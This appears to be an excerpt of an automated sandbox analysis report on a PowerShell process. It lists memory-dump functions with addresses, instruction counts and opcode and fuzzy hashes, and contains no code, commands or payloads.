                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: tP^q
                                                                                                                                                                                          • API String ID: 0-2862610199
                                                                                                                                                                                          • Opcode ID: 79e2f7fd7284e1c49bc04326b28d0ce8a34b09c48db8df9ddb71ebfbfeb8ea54
                                                                                                                                                                                          • Instruction ID: dafd5cc0a26b3965f49593ad55fb3c8f2c813180b42449b71f796a3773e240c0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79e2f7fd7284e1c49bc04326b28d0ce8a34b09c48db8df9ddb71ebfbfeb8ea54
                                                                                                                                                                                          • Instruction Fuzzy Hash: B2214CB5A093829FD715CB548814BA5BFF2AF82220F098197D408CF1D2CB36D844C7E1
                                                                                                                                                                                          Function 028239B0 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 099a21e8fe94d64ae43692a18fedfb6a4ef7a7a14a1b2e3e5ad9d68b4b4cdf77
                                                                                                                                                                                          • Instruction ID: ef41c56f44e5aaf5f90024053acdf58ff6f85d408436cb4245dc2b99a99c8d93
                                                                                                                                                                                          • Opcode Fuzzy Hash: 099a21e8fe94d64ae43692a18fedfb6a4ef7a7a14a1b2e3e5ad9d68b4b4cdf77
                                                                                                                                                                                          • Instruction Fuzzy Hash: B6D1F678A00218AFDB04CF98D594A9DFBB2FF48314F258599E809EB365C735ED85CB90
                                                                                                                                                                                          Function 02828A40 Relevance: .3, Instructions: 319COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a4ff9bcabae12cb6110fa44dcde0be172d307f6b017a0cdc613599f392a733aa
                                                                                                                                                                                          • Instruction ID: 441665947f7edaa39c4a7caf0beeaa970123c1d300b344386d215f490e326b61
                                                                                                                                                                                          • Opcode Fuzzy Hash: a4ff9bcabae12cb6110fa44dcde0be172d307f6b017a0cdc613599f392a733aa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 88C17A39A00218DFCF14DFA4D544A9DBBB2FF84314F118559E80AEB365CB74AD89CB90
                                                                                                                                                                                          Function 028231C8 Relevance: .3, Instructions: 301COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a5f541fbbd0c2a5907fc9f1c054cbb43d27252ce5386fae8bb2488524a2f4402
                                                                                                                                                                                          • Instruction ID: 6983926bb6b535920a739f80e5a31b00a4971476571e055882396e70992263e4
                                                                                                                                                                                          • Opcode Fuzzy Hash: a5f541fbbd0c2a5907fc9f1c054cbb43d27252ce5386fae8bb2488524a2f4402
                                                                                                                                                                                          • Instruction Fuzzy Hash: 05D11878A01258AFCB05CFA8D594A9DFBB2EF48314F24C195E819AB361C735ED85CB90
                                                                                                                                                                                          Function 0282EF6C Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 21f6bbe1a18de986d62eff26437ca6bc9d572cfea62dccddc98c9f0deca1b1fd
                                                                                                                                                                                          • Instruction ID: 8ac65b2ae98cc63b099018caf0c9c83c6156cf440540f1e3a58bda739895ad29
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21f6bbe1a18de986d62eff26437ca6bc9d572cfea62dccddc98c9f0deca1b1fd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FB17C78E002298FDB10CFA8D98179DBBF1EF59714F248129D918E7694EB749889CB81
                                                                                                                                                                                          Function 02822B48 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a637b847b6f1c53c194a1447b7a9efd7f15a25086c9234d78ed2792facd9f886
                                                                                                                                                                                          • Instruction ID: 5750e2e11fb78713b406115cd4e15aa14c8e84712d567620885e3aaeb274b950
                                                                                                                                                                                          • Opcode Fuzzy Hash: a637b847b6f1c53c194a1447b7a9efd7f15a25086c9234d78ed2792facd9f886
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82A1CF78A042598FCB05CF58C4949AAFBB1FF49314B24859AD855EB3A9C335FC85CFA0
                                                                                                                                                                                          Function 028282A0 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: dd7ee85a3c31975f0c50bedaf9ec67d708751b3b8439bf8ed82ae1a0ae94a47b
                                                                                                                                                                                          • Instruction ID: c1061821b6d6f3f05f118e843b8bc8dc8eaa2233f77e3e29f28235cd21e27122
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd7ee85a3c31975f0c50bedaf9ec67d708751b3b8439bf8ed82ae1a0ae94a47b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C718038A01254DFCB15CBA4D9849ADBBF2FF89314F1984A9E405EB361D735EC85CB20
                                                                                                                                                                                          Function 02829376 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 02b8d6c9fbd6f632dd0f0d604ec34701617f277e2c20b057f7c5dce4e9aebe28
                                                                                                                                                                                          • Instruction ID: 50420b59c7b69a82c5a3cf5aa2daf34541fd4c170a34d07181885b04cf2aa86a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 02b8d6c9fbd6f632dd0f0d604ec34701617f277e2c20b057f7c5dce4e9aebe28
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42714B74E00218DFDF15DFA4D554BADBBF6BF88308F248529D416AB2A0DB74AC86CB50
                                                                                                                                                                                          Function 02829208 Relevance: .2, Instructions: 185COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5658a8a4251422c97cdf11f26700001bd463edf7dc73d56dea1e27db8ab0e6d7
                                                                                                                                                                                          • Instruction ID: 8b4ae6bf38f16c6780bcf660ed918af21f4a740bb65e21b670ee3afdd695bd04
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5658a8a4251422c97cdf11f26700001bd463edf7dc73d56dea1e27db8ab0e6d7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7771B034A00219CFCB14DF68D584A9DBBF6FF84314F248569D419EB791DB75AC86CB80
                                                                                                                                                                                          Function 02828F99 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8694db8567035169ffa8fdc5b81c2cb34ec4a16f1c07d259b2db37a2ab238c1b
                                                                                                                                                                                          • Instruction ID: 02bb7df924b760230791f8f950b1f6b8d9b5bdf6eb4ffa768cdfb7e474ec6544
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8694db8567035169ffa8fdc5b81c2cb34ec4a16f1c07d259b2db37a2ab238c1b
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE41AE38B00224CFDB14DB25C958AAD7BB3EF8C754F144469E40AEB7A0CB799C85CB60
                                                                                                                                                                                          Function 0700A354 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 789ac529e1b49df9548137397d0961722fd0a2c74dfc9863b7a1a1a470841900
                                                                                                                                                                                          • Instruction ID: b86309ffc35829b97a5dfb3bf2248375397c7e708f3949a15f51de08afa8ad99
                                                                                                                                                                                          • Opcode Fuzzy Hash: 789ac529e1b49df9548137397d0961722fd0a2c74dfc9863b7a1a1a470841900
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4641F8F5B00302CFEB648FA88405B697BE2AB81261F14C2A5D5059B2D2DB75D941C7E2
                                                                                                                                                                                          Function 028291F3 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c6a1cf8a93a1333229f77d369379ea324a70549c385fee0ae7a5746ff0e70b6c
                                                                                                                                                                                          • Instruction ID: 054ed74609f7af2268fa33d1a7ee2cda2a40e71f8a47cc3cce5b7f340df7ea7f
                                                                                                                                                                                          • Opcode Fuzzy Hash: c6a1cf8a93a1333229f77d369379ea324a70549c385fee0ae7a5746ff0e70b6c
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9414B74E00228DFDB14DFA5C548B9DBBB2BF88304F148529D016EB3A4DB74AC89CB54
                                                                                                                                                                                          Function 02822C59 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a6cca805253556204f9edf3c738d993cb94e6926bcd2a58210e7db902d27d8f7
                                                                                                                                                                                          • Instruction ID: 635ce6c0bfd6c7f8feac52c1ea4ef72f25ab6db94e6ab8d47ef8b84ba4a1a542
                                                                                                                                                                                          • Opcode Fuzzy Hash: a6cca805253556204f9edf3c738d993cb94e6926bcd2a58210e7db902d27d8f7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 524128B8A005198FCB15CF59C594EAAFBB1FF48314B15819AD805AB368C735FD94CF90
                                                                                                                                                                                          Function 07006EB6 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 6288947c648bf8e0ba4531194a3cfd76b7b3aa824f9ad90089589def1e831b7b
                                                                                                                                                                                          • Instruction ID: dad9c60d6d2d8bdb6667634c3e2c4d459018766da7a0a730e9349147edad13f2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6288947c648bf8e0ba4531194a3cfd76b7b3aa824f9ad90089589def1e831b7b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7231A134B40208AFD704A7E8CC55FAE7AA3AF84350F258464E9016F3D5CE76EC428BD2
                                                                                                                                                                                          Function 07000A78 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 78269485519bc01e2749043c0e36b5541984232b79112e1510108a5c662bbc77
                                                                                                                                                                                          • Instruction ID: 23284fdff7d8082927cc8dfb08a2ebc2fc9856a3907c1887546397725154e8f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 78269485519bc01e2749043c0e36b5541984232b79112e1510108a5c662bbc77
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2421AD75300316ABE76459BA8800B3BB7CA9BC5725F24893AA54ACF3C2CE35C941C3E1
                                                                                                                                                                                          Function 07000A5B Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 6a3268cff2ce75def6c5553291307e9c207df6020434968685d80816f679cf4f
                                                                                                                                                                                          • Instruction ID: 201358aa61893dc850e4bc321602b4fa66c399c29825260dd41d11ed7fabc913
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a3268cff2ce75def6c5553291307e9c207df6020434968685d80816f679cf4f
                                                                                                                                                                                          • Instruction Fuzzy Hash: F7219E743083562FE7640AB98C11B767FD65B96310F18C66AA548CF2C7CA39D985C3F2
                                                                                                                                                                                          Function 028239A1 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 2fda1df79d62acf954e9c3a802bd3ae2bbb515b6676f597a7c49bb765775dff9
                                                                                                                                                                                          • Instruction ID: 765a9afff040faa2b3a5fe64843f359a715278392d08510ce24437c132f9eaa0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fda1df79d62acf954e9c3a802bd3ae2bbb515b6676f597a7c49bb765775dff9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C21E978A00519DFCB04CF89C9949AAFBB1FF48310B1585A9D819EB755C735EC91CBA0
                                                                                                                                                                                          Function 07000868 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 10b161573835fd1ffe9e6baa347403e98ae1a62c5d37c55408e88b0e9744e5b6
                                                                                                                                                                                          • Instruction ID: bcdf6875ea05cf93395e8206b51e810b15a6689310efada9a3442bc89cabec0b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 10b161573835fd1ffe9e6baa347403e98ae1a62c5d37c55408e88b0e9744e5b6
                                                                                                                                                                                          • Instruction Fuzzy Hash: D801F7763002169BE76459AAD40077AB7D9EFC2232F14C43FD5C5CB681DA32C845C7E0
                                                                                                                                                                                          Function 070059E8 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4aaead8577c817e875b719886e983979d190cb276b34aa029359acea14b5ad02
                                                                                                                                                                                          • Instruction ID: 98c10ae2ccb6612a97a19ea6f8266bf31238ba5f9d6b8cf0e373fd365a0b1efb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aaead8577c817e875b719886e983979d190cb276b34aa029359acea14b5ad02
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A01F2B63102258BEB24856EA840A2BB7D98BC2231F14C43BD506C7280D972C872CBF4
                                                                                                                                                                                          Function 0282E993 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 20dd029975ea19f5c734f6e14327faef3e3f257505c868e139dc287ae92ce1b0
                                                                                                                                                                                          • Instruction ID: 2f72c6c2a40882568a538391801fcd09b531678bca448c3c99b7224867947339
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20dd029975ea19f5c734f6e14327faef3e3f257505c868e139dc287ae92ce1b0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7111933CD10168CBDF74DA98D5987ACB7B1AB5531AF14242AC049F6190AB7468CDCF1A
                                                                                                                                                                                          Function 07000000 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e85a1e5d8e0de744f0f0a8d3d2016c76fe3cf604580839c65333f91398787ae0
                                                                                                                                                                                          • Instruction ID: 4234a8a6e7c08860f96abdcecaa441b6bb5c0daa51ba312556cf36536ecd3941
                                                                                                                                                                                          • Opcode Fuzzy Hash: e85a1e5d8e0de744f0f0a8d3d2016c76fe3cf604580839c65333f91398787ae0
                                                                                                                                                                                          • Instruction Fuzzy Hash: A401CE5058E7C61FE30713B448366967FB26E87510B4A45D7D181CF9E7C84A084E87A3
                                                                                                                                                                                          Function 027BD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088226412.00000000027BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027BD000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_27bd000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 44b7eae680bd32949050b543ea95039b8128fa1fa1778a702bce9ae7d150d712
                                                                                                                                                                                          • Instruction ID: fb8f5d8a6c245573e10262015be50412b6230f0ddeef1a7ba385230793b66bb4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 44b7eae680bd32949050b543ea95039b8128fa1fa1778a702bce9ae7d150d712
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB0126311093409EE7328A29CEC4BA7BF98EF41324F08C42AEC085B286C379D841CAB1
                                                                                                                                                                                          Function 027BD007 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088226412.00000000027BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027BD000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_27bd000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f06f8857f8fa88d604ed2000264fe74fc19d8c78176f5393a15063a350b41935
                                                                                                                                                                                          • Instruction ID: c7342e95e7501c799ffffe2dad7b92eecadb3069e29a901a578aa0772efa2263
                                                                                                                                                                                          • Opcode Fuzzy Hash: f06f8857f8fa88d604ed2000264fe74fc19d8c78176f5393a15063a350b41935
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48015E7100E3C09ED7138B258894BA2BFB4EF43224F1DC0CBD8888F1A7C2699849C772
                                                                                                                                                                                          Function 0282FC3F Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a9e90dedcded59771f681654c022d4797bcbad0e6cbaecc32caca53604cb189d
                                                                                                                                                                                          • Instruction ID: 163a2d3a63e1c0ace65eddf31696bf753c0b45f9a70c6e0578ae9d35dab1c51c
                                                                                                                                                                                          • Opcode Fuzzy Hash: a9e90dedcded59771f681654c022d4797bcbad0e6cbaecc32caca53604cb189d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E013C75E00119DFCB14CF98C8809ADF7B2FF88324B248669D919E7654C732EC95CB90
                                                                                                                                                                                          Function 0700308F Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0ea29da65be6fdf3eac385bc75e38af4ca5f4b130ea0bfef854a608b02b8b9a1
                                                                                                                                                                                          • Instruction ID: 7390a8a62b9b8ca6dc31439bb18bf578cc1525b3412b701b231801a425127435
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ea29da65be6fdf3eac385bc75e38af4ca5f4b130ea0bfef854a608b02b8b9a1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 14E0EDA020A3819FE36B87608864851FB61BB87220B1D86CFD0858B1E7C6269946D792

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 0700D180 Relevance: 20.4, Strings: 16, Instructions: 390COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$4'^q$4'^q$TQcq$TQcq$TQcq$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-1911287250
                                                                                                                                                                                          • Opcode ID: 41be131aff46e89296d9b9bf671622a735bc8a50bd725c14bef36ab535cc567f
                                                                                                                                                                                          • Instruction ID: 52f072520ad0a68bb02106ff58a4eb8b38b6f226c4aa96bc266317487edacf27
                                                                                                                                                                                          • Opcode Fuzzy Hash: 41be131aff46e89296d9b9bf671622a735bc8a50bd725c14bef36ab535cc567f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CD14BB570020ADFEB558FA8C40466A7BF2AF85321F1486AAE8158B2D5DB31DC45CBF1
